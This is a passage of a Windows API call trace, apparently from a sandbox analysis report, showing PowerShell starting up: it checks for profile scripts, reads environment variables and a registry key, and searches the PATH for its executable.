	[0425.238] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x20d730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0425.238] SetErrorMode (uMode=0x1) returned 0x1
	[0425.238] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x20d940 | out: lpFileInformation=0x20d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0425.238] SetErrorMode (uMode=0x1) returned 0x1
	[0425.238] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x20d730, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0425.238] SetErrorMode (uMode=0x1) returned 0x1
	[0425.238] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x20d940 | out: lpFileInformation=0x20d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0425.238] SetErrorMode (uMode=0x1) returned 0x1
	[0425.238] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x20d730, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0425.238] SetErrorMode (uMode=0x1) returned 0x1
	[0425.238] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x20d940 | out: lpFileInformation=0x20d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0425.238] SetErrorMode (uMode=0x1) returned 0x1
	[0425.239] CoTaskMemAlloc (cb=0x104) returned 0x1b91ca40
	[0425.239] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91ca40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0425.239] CoTaskMemFree (pv=0x1b91ca40) 
	[0425.240] CoTaskMemAlloc (cb=0x104) returned 0x1b91ca40
	[0425.240] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91ca40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0425.240] CoTaskMemFree (pv=0x1b91ca40) 
	[0425.242] CoTaskMemAlloc (cb=0x104) returned 0x1b91ca40
	[0425.242] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91ca40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0425.243] CoTaskMemFree (pv=0x1b91ca40) 
	[0425.245] CoTaskMemAlloc (cb=0x104) returned 0x1b91ca40
	[0425.245] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91ca40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0425.246] CoTaskMemFree (pv=0x1b91ca40) 
	[0425.250] CoTaskMemAlloc (cb=0x104) returned 0x1b91ca40
	[0425.250] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91ca40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0425.250] CoTaskMemFree (pv=0x1b91ca40) 
	[0425.252] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x334
	[0425.252] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x338
	[0425.252] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x33c
	[0425.252] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2fc
	[0425.252] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1c8
	[0425.252] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x304
	[0425.252] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x318
	[0425.252] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x378
	[0425.252] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x37c
	[0425.252] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x32c
	[0425.252] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x348
	[0425.252] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x34c
	[0425.254] CoTaskMemAlloc (cb=0x104) returned 0x1b91ca40
	[0425.254] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91ca40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0425.254] CoTaskMemFree (pv=0x1b91ca40) 
	[0425.257] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0425.257] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x20db20 | out: lpMode=0x20db20) returned 1
	[0425.572] CoTaskMemAlloc (cb=0x104) returned 0x1b91ca40
	[0425.572] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91ca40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0425.573] CoTaskMemFree (pv=0x1b91ca40) 
	[0425.576] SetEvent (hEvent=0x2fc) returned 1
	[0425.576] SetEvent (hEvent=0x334) returned 1
	[0425.576] SetEvent (hEvent=0x338) returned 1
	[0425.576] SetEvent (hEvent=0x33c) returned 1
	[0425.576] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x350
	[0425.578] CoTaskMemAlloc (cb=0x104) returned 0x1b91ca40
	[0425.578] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91ca40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0425.578] CoTaskMemFree (pv=0x1b91ca40) 
	[0425.578] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d878 | out: phkResult=0x20d878*=0x354) returned 0x0
	[0425.578] RegQueryValueExW (in: hKey=0x354, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x20d7fc, lpData=0x0, lpcbData=0x20d7f8*=0x0 | out: lpType=0x20d7fc*=0x0, lpData=0x0, lpcbData=0x20d7f8*=0x0) returned 0x2

Thread:
	id = 209
	os_tid = 0xc14


Thread:
	id = 231
	os_tid = 0xcbc


Thread:
	id = 476
	os_tid = 0x11a0


Thread:
	id = 477
	os_tid = 0x11a8


Thread:
	id = 485
	os_tid = 0x11f4


Thread:
	id = 491
	os_tid = 0x1224


Thread:
	id = 496
	os_tid = 0x123c

	[0377.506] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0406.321] LocalFree (hMem=0x3072c0) returned 0x0
	[0406.321] CloseHandle (hObject=0x318) returned 1
	[0406.322] CloseHandle (hObject=0x13) returned 1
	[0406.322] CloseHandle (hObject=0xf) returned 1
	[0406.323] RegCloseKey (hKey=0x304) returned 0x0
	[0406.323] RegCloseKey (hKey=0x300) returned 0x0
	[0406.323] RegCloseKey (hKey=0x2fc) returned 0x0
	[0406.323] LocalFree (hMem=0x307290) returned 0x0
	[0406.323] RegCloseKey (hKey=0x1c8) returned 0x0
	[0410.838] RegCloseKey (hKey=0x1c8) returned 0x0
	[0415.279] RegCloseKey (hKey=0x1c4) returned 0x0
	[0415.280] RegCloseKey (hKey=0x318) returned 0x0
	[0415.280] RegCloseKey (hKey=0x304) returned 0x0
	[0415.280] RegCloseKey (hKey=0x1c8) returned 0x0
	[0415.280] RegCloseKey (hKey=0x2fc) returned 0x0
	[0415.280] RegCloseKey (hKey=0x33c) returned 0x0
	[0415.280] RegCloseKey (hKey=0x338) returned 0x0
	[0415.281] RegCloseKey (hKey=0x334) returned 0x0
	[0415.281] RegCloseKey (hKey=0x330) returned 0x0
	[0415.281] RegCloseKey (hKey=0x32c) returned 0x0
	[0420.143] RegCloseKey (hKey=0x374) returned 0x0
	[0420.143] RegCloseKey (hKey=0x370) returned 0x0
	[0420.143] RegCloseKey (hKey=0x36c) returned 0x0
	[0420.144] RegCloseKey (hKey=0x368) returned 0x0
	[0420.144] RegCloseKey (hKey=0x1c4) returned 0x0
	[0420.144] RegCloseKey (hKey=0x380) returned 0x0
	[0420.144] RegCloseKey (hKey=0x360) returned 0x0
	[0420.145] RegCloseKey (hKey=0x35c) returned 0x0
	[0420.145] RegCloseKey (hKey=0x358) returned 0x0
	[0420.145] RegCloseKey (hKey=0x354) returned 0x0
	[0420.145] RegCloseKey (hKey=0x350) returned 0x0
	[0420.146] RegCloseKey (hKey=0x34c) returned 0x0
	[0420.146] RegCloseKey (hKey=0x348) returned 0x0
	[0420.146] RegCloseKey (hKey=0x32c) returned 0x0
	[0420.146] RegCloseKey (hKey=0x37c) returned 0x0
	[0420.147] RegCloseKey (hKey=0x378) returned 0x0
	[0420.147] RegCloseKey (hKey=0x318) returned 0x0
	[0420.147] RegCloseKey (hKey=0x304) returned 0x0
	[0420.147] RegCloseKey (hKey=0x1c8) returned 0x0
	[0420.148] RegCloseKey (hKey=0x2fc) returned 0x0
	[0420.148] RegCloseKey (hKey=0x33c) returned 0x0
	[0420.148] RegCloseKey (hKey=0x338) returned 0x0
	[0420.148] RegCloseKey (hKey=0x334) returned 0x0
	[0420.149] RegCloseKey (hKey=0x330) returned 0x0
	[0641.430] RegCloseKey (hKey=0x354) returned 0x0

Thread:
	id = 596
	os_tid = 0xda8


Thread:
	id = 667
	os_tid = 0x14c0

	[0425.822] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0425.825] SetThreadUILanguage (LangId=0x0) returned 0x7fffffa0409
	[0425.829] CoTaskMemAlloc (cb=0x104) returned 0x1b91ca40
	[0425.829] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91ca40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0425.829] CoTaskMemFree (pv=0x1b91ca40) 
	[0425.830] VirtualQuery (in: lpAddress=0x1c88dcc0, lpBuffer=0x1c88eb80, dwLength=0x30 | out: lpBuffer=0x1c88eb80*(BaseAddress=0x1c88d000, AllocationBase=0x1bf00000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.833] CoTaskMemAlloc (cb=0x104) returned 0x1b91ca40
	[0425.833] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91ca40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0425.833] CoTaskMemFree (pv=0x1b91ca40) 
	[0425.835] CoTaskMemAlloc (cb=0x104) returned 0x1b91ca40
	[0425.835] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91ca40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0425.835] CoTaskMemFree (pv=0x1b91ca40) 
	[0425.838] CoTaskMemAlloc (cb=0x104) returned 0x1b91ca40
	[0425.838] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91ca40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0425.838] CoTaskMemFree (pv=0x1b91ca40) 
	[0425.851] CoTaskMemAlloc (cb=0x104) returned 0x1b91ca40
	[0425.851] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91ca40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0425.851] CoTaskMemFree (pv=0x1b91ca40) 
	[0425.859] CoTaskMemAlloc (cb=0x104) returned 0x1b91ca40
	[0425.859] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91ca40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0425.860] CoTaskMemFree (pv=0x1b91ca40) 
	[0425.861] CoTaskMemAlloc (cb=0x104) returned 0x1b91ca40
	[0425.861] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91ca40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0425.861] CoTaskMemFree (pv=0x1b91ca40) 
	[0425.864] VirtualQuery (in: lpAddress=0x1c88df70, lpBuffer=0x1c88ee30, dwLength=0x30 | out: lpBuffer=0x1c88ee30*(BaseAddress=0x1c88d000, AllocationBase=0x1bf00000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.865] CoTaskMemAlloc (cb=0x104) returned 0x1b91ca40
	[0425.865] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91ca40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0425.865] CoTaskMemFree (pv=0x1b91ca40) 
	[0426.126] CoTaskMemAlloc (cb=0x104) returned 0x1b91ca40
	[0426.126] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91ca40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0426.126] CoTaskMemFree (pv=0x1b91ca40) 
	[0426.126] CoTaskMemAlloc (cb=0x104) returned 0x1b91ca40
	[0426.126] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91ca40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0426.126] CoTaskMemFree (pv=0x1b91ca40) 
	[0426.127] CoTaskMemAlloc (cb=0x104) returned 0x1b91ca40
	[0426.127] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91ca40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0426.127] CoTaskMemFree (pv=0x1b91ca40) 
	[0426.131] CoTaskMemAlloc (cb=0x104) returned 0x1b91ca40
	[0426.131] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91ca40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0426.131] CoTaskMemFree (pv=0x1b91ca40) 
	[0426.420] CoTaskMemAlloc (cb=0x104) returned 0x1b91ca40
	[0426.420] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91ca40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0426.420] CoTaskMemFree (pv=0x1b91ca40) 
	[0426.423] CoTaskMemAlloc (cb=0x104) returned 0x1b91ca40
	[0426.423] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91ca40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0426.423] CoTaskMemFree (pv=0x1b91ca40) 
	[0426.424] CoTaskMemAlloc (cb=0x104) returned 0x1b91ca40
	[0426.424] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91ca40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0426.424] CoTaskMemFree (pv=0x1b91ca40) 
	[0426.427] CoTaskMemAlloc (cb=0x104) returned 0x1b91ca40
	[0426.427] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91ca40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0426.427] CoTaskMemFree (pv=0x1b91ca40) 
	[0426.428] CoTaskMemAlloc (cb=0x104) returned 0x1b91ca40
	[0426.428] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91ca40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0426.428] CoTaskMemFree (pv=0x1b91ca40) 
	[0426.430] CoTaskMemAlloc (cb=0x104) returned 0x1b91ca40
	[0426.430] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91ca40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0426.430] CoTaskMemFree (pv=0x1b91ca40) 
	[0426.431] CoTaskMemAlloc (cb=0x104) returned 0x1b91ca40
	[0426.431] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91ca40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0426.432] CoTaskMemFree (pv=0x1b91ca40) 
	[0426.671] CoTaskMemAlloc (cb=0x104) returned 0x1b91ca40
	[0426.671] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91ca40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0426.671] CoTaskMemFree (pv=0x1b91ca40) 
	[0427.059] CoTaskMemAlloc (cb=0x104) returned 0x1b91ca40
	[0427.059] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b91ca40, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0427.059] CoTaskMemFree (pv=0x1b91ca40) 
	[0427.062] CoTaskMemAlloc (cb=0x104) returned 0x1b91ca40
	[0427.062] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1b91ca40, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0427.062] CoTaskMemFree (pv=0x1b91ca40) 
	[0427.062] CoTaskMemAlloc (cb=0x128) returned 0x1b90ea00
	[0427.062] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1b90ea00, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0427.062] CoTaskMemFree (pv=0x1b90ea00) 
	[0427.066] CoTaskMemAlloc (cb=0x20e) returned 0x1b9060a0
	[0427.066] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b9060a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0427.067] CoTaskMemFree (pv=0x1b9060a0) 
	[0427.070] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0427.072] SetErrorMode (uMode=0x1) returned 0x1
	[0427.074] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0427.084] SetErrorMode (uMode=0x1) returned 0x1
	[0427.305] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0427.305] SetErrorMode (uMode=0x1) returned 0x1
	[0427.305] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0427.313] SetErrorMode (uMode=0x1) returned 0x1
	[0427.314] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0427.314] SetErrorMode (uMode=0x1) returned 0x1
	[0427.314] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0427.323] SetErrorMode (uMode=0x1) returned 0x1
	[0427.324] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0427.324] SetErrorMode (uMode=0x1) returned 0x1
	[0427.324] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0427.332] SetErrorMode (uMode=0x1) returned 0x1
	[0427.334] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0427.334] SetErrorMode (uMode=0x1) returned 0x1
	[0427.334] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0427.342] SetErrorMode (uMode=0x1) returned 0x1
	[0427.343] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0427.344] SetErrorMode (uMode=0x1) returned 0x1
	[0427.344] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0427.586] SetErrorMode (uMode=0x1) returned 0x1
	[0427.587] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0427.587] SetErrorMode (uMode=0x1) returned 0x1
	[0427.588] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0427.596] SetErrorMode (uMode=0x1) returned 0x1
	[0427.597] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0427.597] SetErrorMode (uMode=0x1) returned 0x1
	[0427.597] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c88dea0 | out: lpFindFileData=0x1c88dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0427.605] SetErrorMode (uMode=0x1) returned 0x1
	[0427.607] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c88dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0427.607] SetErrorMode (uMode=0x1) returned 0x1
